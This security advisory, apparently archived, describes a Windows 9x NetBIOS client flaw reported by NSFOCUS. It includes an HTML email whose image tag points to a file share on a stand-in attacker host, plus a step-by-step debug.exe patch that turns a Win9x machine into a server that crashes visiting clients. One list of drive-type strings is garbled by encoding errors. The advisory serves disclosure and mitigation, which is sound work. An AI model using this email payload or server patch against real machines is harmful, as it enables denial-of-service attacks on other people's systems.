COMMAND

    NetBIOS

SYSTEMS AFFECTED

    Win9x

PROBLEM

    Following is based on a Nsfocus Security Team SA2000-04  Advisory.
    NSFOCUS security team has found a security flaw in Microsoft Win9x
    NETBIOS client.  Exploitation  of this vulnerability, a  malicious
    attacker can modify his file share service and perform DoS  attack
    to a Win9x client that visits it.

    When  Win9x  client  accessing  NETBIOS  file  shared services and
    comparing the driver  types, if the  returned type from  server is
    none of  below:"£¿£¿£¿£¿£¿"," A£º","  LPT1£º" ,"  COMM"or"IPC"£¬it
    will lead to the sixth result, which is fake cause there are  only
    five of them.   So, win9x client will  get a wrong driver  pointer
    from conversion, transfer the control to the wrong driver function
    address and finally crash.

    Malicious user can send an HTML  email to his target.  One  sample
    file is like this:

        <html>
        <body>
        hello
        <img src="file:\\attacker.host\pub\a.gif">
        <body>
        </html>

    When a  win9x client  read the  malicious HTML  email with outlook
    express or other email client  with HTML support, the client  will
    be DoS.

    Exploit?   You can  do like  this (windows  98 Secondary  Edition,
    English version):

        D:\WIN98\SYSTEM>debug vserver.vxd
        -d 2b60
        1266:2B60  3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
        1266:2B70  64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
        1266:2B80  05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
        1266:2B90  65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
        1266:2BA0  1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
        1266:2BB0  70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
        1266:2BC0  00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
        1266:2BD0  91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*.t..@*.
        -n vserver.bak    (backup)
        -w
        Writing 1B8F8 bytes
        -n vserver.vxd
        -e 2b60 33 c0 c3
        -w
        Writing 1B8F8 bytes
        -q

    - and reboot the machine.
    - Set a password for a shared directory.
    - Access the share directory  from another win9x client.
    - Usually  the client  will get  "blue screen"  , then  the system
      will become unstable or halt.

SOLUTION

    Don't access  the untrusted  host's file  share service.   Disable
    NetBIOS over TCP/IP.  Microsoft has been informed.